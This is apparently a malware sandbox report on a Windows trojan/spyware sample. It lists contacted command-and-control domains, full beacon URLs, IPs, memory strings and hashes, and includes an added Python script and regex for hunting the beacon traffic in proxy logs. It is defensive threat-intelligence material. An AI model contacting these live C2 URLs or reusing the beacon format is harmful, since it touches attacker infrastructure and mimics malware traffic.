• http://www.comect.online/hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB
• https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
• https://www.transip.eu/terms-of-service/
• http://www.jgkgf.club/tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRB
• http://www.sssvip2.shop/6t0f/?EzZ=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&BjRxb=8r70fhQxdN4lRB

A "safe" verdict from a URL reputation feed is not a clean bill for this infrastructure: the sandbox's own contacted-domain and contacted-URL tables mark the same hosts and beacon URLs as malicious, and reputation feeds routinely lag behind freshly stood-up C2 domains. Block on the behavioural evidence, not on the feed.
Contacted domains

Name | IP | Active | Malicious | Antivirus detection | Reputation
www.comect.online | 124.6.61.130 | true | true | - | unknown
www.allstary.top | 199.193.6.134 | true | true | - | unknown
ccchhua889911.222tt.icu | 172.247.112.164 | true | true | - | unknown
www.sssvip2.shop | 156.253.8.115 | true | true | - | unknown
www.hsa.world | 13.248.169.48 | true | true | - | unknown
dutchdubliners.online | 37.97.254.27 | true | true | - | unknown
www.16v9tiu00r.ink | unknown | unknown | false | - | unknown
www.dutchdubliners.online | unknown | unknown | false | - | unknown
www.jgkgf.club | unknown | unknown | false | - | unknown
Contacted URLs

Name | Malicious | Antivirus detection | Reputation
http://www.dutchdubliners.online/7ujc/?EzZ=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&BjRxb=8r70fhQxdN4lRB | true | Avira URL Cloud: safe | unknown
http://www.dutchdubliners.online/7ujc/ | true | Avira URL Cloud: safe | unknown
http://www.allstary.top/rdvg/?EzZ=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&BjRxb=8r70fhQxdN4lRB | true | Avira URL Cloud: safe | unknown
http://www.allstary.top/rdvg/ | true | Avira URL Cloud: safe | unknown
http://www.hsa.world/09b7/ | true | Avira URL Cloud: safe | unknown
http://www.sssvip2.shop/6t0f/ | true | Avira URL Cloud: safe | unknown
http://www.comect.online/hmf8/ | true | Avira URL Cloud: safe | unknown
http://www.comect.online/hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB | true | Avira URL Cloud: safe | unknown
http://www.hsa.world/09b7/?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB | true | Avira URL Cloud: safe | unknown
http://www.sssvip2.shop/6t0f/?EzZ=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&BjRxb=8r70fhQxdN4lRB | true | Avira URL Cloud: safe | unknown
http://www.jgkgf.club/tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRB | true | Avira URL Cloud: safe | unknown
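What an analyst does next with the six full beacon URLs above is pivot on what they share. The following is an added example, not part of the Joe Sandbox report: it parses the URLs as listed, summarises the common structure (one four-character directory, the same two query keys, a fixed-size base64 blob, one shared trailing token) and derives a proxy-log hunting pattern from it. The URL strings are copied from the report; the shape heuristic, every function name, and the decision to treat the second query value as a campaign or bot token are this example's own assumptions.

```python
"""Pivot on the beacon URLs listed in the report and derive a hunting pattern."""
import re
from base64 import b64decode
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# The six full C2 URLs from the report's contacted-URL table.
C2_URLS = [
    "http://www.allstary.top/rdvg/?EzZ=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&BjRxb=8r70fhQxdN4lRB",
    "http://www.dutchdubliners.online/7ujc/?EzZ=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&BjRxb=8r70fhQxdN4lRB",
    "http://www.hsa.world/09b7/?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB",
    "http://www.comect.online/hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB",
    "http://www.jgkgf.club/tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRB",
    "http://www.sssvip2.shop/6t0f/?EzZ=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&BjRxb=8r70fhQxdN4lRB",
]

Pair = Tuple[str, str]


def split_query(query: str) -> List[Pair]:
    """Split k=v pairs by hand: urllib's parse_qsl would turn '+' into ' '
    and corrupt the base64 blob."""
    pairs = []
    for part in query.split("&"):
        key, _, value = part.partition("=")
        pairs.append((key, value))
    return pairs


def parse_c2(url: str) -> Dict[str, object]:
    parts = urlsplit(url)
    return {"host": parts.hostname, "path": parts.path, "params": split_query(parts.query)}


_PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
_TOKEN_RE = re.compile(r"^[A-Za-z0-9]{8,24}$")


def matches_shape(rec: Dict[str, object]) -> bool:
    """Heuristic for the shape all six URLs share: a four-character directory,
    exactly two parameters, the first a long base64 blob, the second a short token."""
    params = rec["params"]
    if _PATH_RE.match(rec["path"]) is None or len(params) != 2:
        return False
    blob, token = params[0][1], params[1][1]
    return (len(blob) >= 64 and _B64_RE.match(blob) is not None
            and _TOKEN_RE.match(token) is not None)


def pivot(urls: List[str]) -> Dict[str, object]:
    """Summarise what a set of URLs has in common: hosts, paths, query-key sets,
    trailing-token values and the decoded size of the leading blob."""
    recs = [parse_c2(u) for u in urls]
    matching = [r for r in recs if matches_shape(r)]
    return {
        "hosts": sorted(r["host"] for r in recs),
        "paths": sorted(r["path"] for r in recs),
        "matching": len(matching),
        "key_sets": Counter(tuple(k for k, _ in r["params"]) for r in recs),
        "token_values": Counter(r["params"][1][1] for r in matching),
        "blob_lengths": Counter(len(b64decode(r["params"][0][1], validate=True)) for r in matching),
    }


def hunt_pattern(blob_key: str, token_key: str, token_value: Optional[str] = None) -> "re.Pattern[str]":
    """Regex for proxy logs. Pin the token value only once you know it is stable
    across victims; this report alone cannot tell you that."""
    token = re.escape(token_value) if token_value else r"[A-Za-z0-9]{8,24}"
    return re.compile(
        r"/[a-z0-9]{4}/\?" + re.escape(blob_key) + r"=[A-Za-z0-9+/]{64,}={0,2}&"
        + re.escape(token_key) + "=" + token + r'(?=$|[&\s"])'
    )


if __name__ == "__main__":
    summary = pivot(C2_URLS)
    for key, value in summary.items():
        print(f"{key}: {value}")
    print("hunt:", hunt_pattern("EzZ", "BjRxb").pattern)
```

On the report's URLs this shows six distinct hosts, six distinct four-character paths, one key set (EzZ, BjRxb) across all of them, one shared BjRxb value (8r70fhQxdN4lRB), and an EzZ blob that is 120 base64 characters, decoding to 89 bytes, in every case. The constant blob size and the shared key and token are far better hunting material than the hostnames, which the operator rotates freely; the unpinned pattern catches the same shape on hosts not in this report.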
URLs from memory and binaries

Sources are abbreviated as follows:
[A] QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp
[B] finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmp
[C] finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp; finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp; cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmp
[D] cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmp
[E] cqvjCApYGBKzop.exe, 0000000B.00000002.3587260572.000000000146C000.00000040.80000000.00040000.00000000.sdmp
[F] QmBbqpEHu0.exe, 00000000.00000002.3592498546.0000000002941000.00000004.00000800.00020000.00000000.sdmp

Name | Source | Malicious | Antivirus detection / Reputation
https://duckduckgo.com/chrome_newtab | [B] | false | high
http://www.fontbureau.com/designersG | [A] | false | high
https://duckduckgo.com/ac/?q= | [B] | false | high
http://www.fontbureau.com/designers/? | [A] | false | high
http://www.founder.com.cn/cn/bThe | [A] | false | high
http://www.fontbureau.com/designers? | [A] | false | high
https://www.transip.eu/knowledgebase/zoeken/ | [C] | false | Avira URL Cloud: safe; unknown
http://www.comect.online | [E] | false | Avira URL Cloud: safe; unknown
https://www.transip.eu/services/search-domains/ | [D] | false | Avira URL Cloud: safe; unknown
http://www.tiro.com | [A] | false | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | [B] | false | high
https://www.transip.nl/services/search-domains/ | [D] | false | high
https://www.transip.nl/vragen/110000534/ | [C] | false | high
http://www.fontbureau.com/designers | [A] | false | high
https://transip.nl/ | [D] | false | high
http://www.goodfont.co.kr | [A] | false | high
http://www.sajatypeworks.com | [A] | false | high
http://www.typography.netD | [A] | false | high
http://www.founder.com.cn/cn/cThe | [A] | false | high
http://www.galapagosdesign.com/staff/dennis.htm | [A] | false | high
https://nl.trustpilot.com/review/www.transip.nl | [C] | false | high
https://www.transip.eu/question/110000577/ | [C] | false | Avira URL Cloud: safe; unknown
https://transip.nl/cp/ | [C] | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | [B] | false | high
https://www.transip.nl/algemene-voorwaarden/ | [C] | false | high
http://www.galapagosdesign.com/DPlease | [A] | false | high
https://www.transip.nl/vragen/198/ | [C] | false | high
http://www.fonts.com | [A] | false | high
http://www.sandoll.co.kr | [A] | false | high
https://www.transip.nl/privacy-policy/ | [C] | false | high
http://www.urwpp.deDPlease | [A] | false | high
https://www.transip.eu/knowledgebase/entry/5885/ | [C] | false | Avira URL Cloud: safe; unknown
http://www.zhongyicts.com.cn | [A] | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | [F] | false | high
http://www.sakkal.com | [A] | false | high
http://www.apache.org/licenses/LICENSE-2.0 | [A] | false | high
http://www.fontbureau.com | [A] | false | high
https://transip.eu/cp/ | [C] | false | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | [B] | false | high
https://transip.eu/ | [D] | false | high
https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/ | [C] | false | Avira URL Cloud: safe; unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | [B] | false | high
https://www.transip.eu/question/100000230 | [C] | false | Avira URL Cloud: safe; unknown
https://www.ecosia.org/newtab/ | [B] | false | high
http://www.carterandcone.coml | [A] | false | high

Two groups in this table are not indicators of anything. The font-foundry URLs in the dropper's memory (fontbureau, founder.com.cn, tiro, goodfont, sajatypeworks, typography.net, galapagosdesign, fonts.com, sandoll, urwpp, zhongyicts, sakkal, carterandcone) are designer and vendor strings from font metadata, which is why they are cut off mid-word. The search-engine URLs in the finger.exe dump are browser default-provider strings read while the injected code harvested browser data. The transip.nl and transip.eu links appear only in the memory of the processes that did the C2 traffic, and dutchdubliners.online sits in TRANSIP-AS address space, so they are most plausibly the body of a TransIP-hosted response page rather than contacts of their own; do not blocklist the registrar on the strength of them.
                                                                                                              https://trustpilot.com/review/www.transip.nlfinger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.transip.nl/vragen/110000580/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://ac.ecosia.org/autocomplete?q=finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.fontbureau.com/designers/cabarga.htmlNQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.founder.com.cn/cnQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.fontbureau.com/designers/frere-user.htmlQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.transip.nl/vragen/110000572finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.jiyu-kobo.co.jp/QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.transip.eu/privacy-policy/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://www.fontbureau.com/designers8QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.transip.nl/knowledgebase/zoeken/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.transip.eu/terms-of-service/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
124.6.61.130 | www.comect.online | Singapore | 132425 | APC-HOSTING-SG APC Hosting Pte Ltd, SG | true
13.248.169.48 | www.hsa.world | United States | 16509 | AMAZON-02, US | true
37.97.254.27 | dutchdubliners.online | Netherlands | 20857 | TRANSIP-AS Amsterdam, the Netherlands, NL | true
172.247.112.164 | ccchhua889911.222tt.icu | United States | 40065 | CNSERVERS, US | true
156.253.8.115 | www.sssvip2.shop | Seychelles | 132813 | AISI-AS-AP HK AISI CLOUD COMPUTING LIMITED, HK | true
199.193.6.134 | www.allstary.top | United States | 22612 | NAMECHEAP-NET, US | true
                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                    Analysis ID:1587945
                                                                                                                                    Start date and time:2025-01-10 19:44:13 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 9m 36s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Run name:Run with higher sleep bypass
Number of new started processes analysed:12
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:2
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:QmBbqpEHu0.exe
                                                                                                                                    renamed because original name is a hash value
                                                                                                                                    Original Sample Name:80639535a88aa7662bb05425e5c1c3520c7642da20a0feaed308fec754661e89.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@11/7@11/6
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 75%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 92%
                                                                                                                                    • Number of executed functions: 109
                                                                                                                                    • Number of non-executed functions: 302
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                    No simulations
                                                                                                                                    • 18.188.126.130
                                                                                                                                    cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 13.248.169.48
                                                                                                                                    https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 108.138.26.73
                                                                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 3.130.71.34
                                                                                                                                    3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 13.248.169.48
                                                                                                                                    https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                                                                                    • 108.138.26.78
                                                                                                                                    FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 18.143.155.63
                                                                                                                                    CNSERVERSUSarm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 23.225.101.86
                                                                                                                                    spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 23.225.150.24
                                                                                                                                    sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 23.225.149.53
                                                                                                                                    6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 41.216.185.130
                                                                                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 41.216.185.178
                                                                                                                                    2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 41.216.185.126
                                                                                                                                    http://www.rr8844.comGet hashmaliciousUnknownBrowse
                                                                                                                                    • 23.224.82.187
                                                                                                                                    botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 23.225.125.76
                                                                                                                                    armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 103.228.168.192
                                                                                                                                    la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 154.212.2.112
                                                                                                                                    APC-HOSTING-SGAPCHostingPteLtdSGPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 124.6.61.130
                                                                                                                                    dB5EGM8l20.dllGet hashmaliciousWannacryBrowse
                                                                                                                                    • 103.14.213.194
                                                                                                                                    TRANSIP-ASAmsterdamtheNetherlandsNLDEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 95.170.75.146
                                                                                                                                    db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                    • 95.170.64.27
                                                                                                                                    la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 136.144.153.6
                                                                                                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 149.210.163.67
                                                                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 89.41.170.24
                                                                                                                                    m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 95.170.75.146
                                                                                                                                    jade.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 95.170.75.158
                                                                                                                                    jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 95.170.75.161
                                                                                                                                    Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 37.97.254.27
                                                                                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 149.210.209.177
                                                                                                                                    No context
                                                                                                                                    No context
Process:C:\Users\user\Desktop\QmBbqpEHu0.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1415
Entropy (8bit):5.352427679901606
Encrypted:false
SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5:97AD91F1C1F572C945DA12233082171D
SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious:true
Reputation:moderate, very likely benign file
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):2232
Entropy (8bit):5.376466846542244
Encrypted:false
SSDEEP:48:2WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugePu/ZPUyus:2LHyIFKL3IZ2KRH9OugYs
MD5:2565617F814F64391598DAE1469067C1
SHA1:E9B4D01811BFE663C3252E62CB6A3A85A5B8DFC0
SHA-256:0034DCBF5590745C396F243C34557071B30F874C9D7E84CB2C84ED417FB07E97
SHA-512:BA9087DE41B86341C92D6CA8D53C605AF51A2C89A0C6390D26015A89A54459D7FE75095C8B16EB5A32DA23BEEBAB711BEC4480CFA7C524C3083610132C6C3384
Malicious:false

Process:C:\Windows\SysWOW64\finger.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.652067313415078
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: QmBbqpEHu0.exe
File size: 916'992 bytes
MD5: eb7415c6ed5d31b69c535afeed1ad3ac
SHA1: 11c7e7e4388044514f499bf63af99c6aebe14e13
SHA256: 80639535a88aa7662bb05425e5c1c3520c7642da20a0feaed308fec754661e89
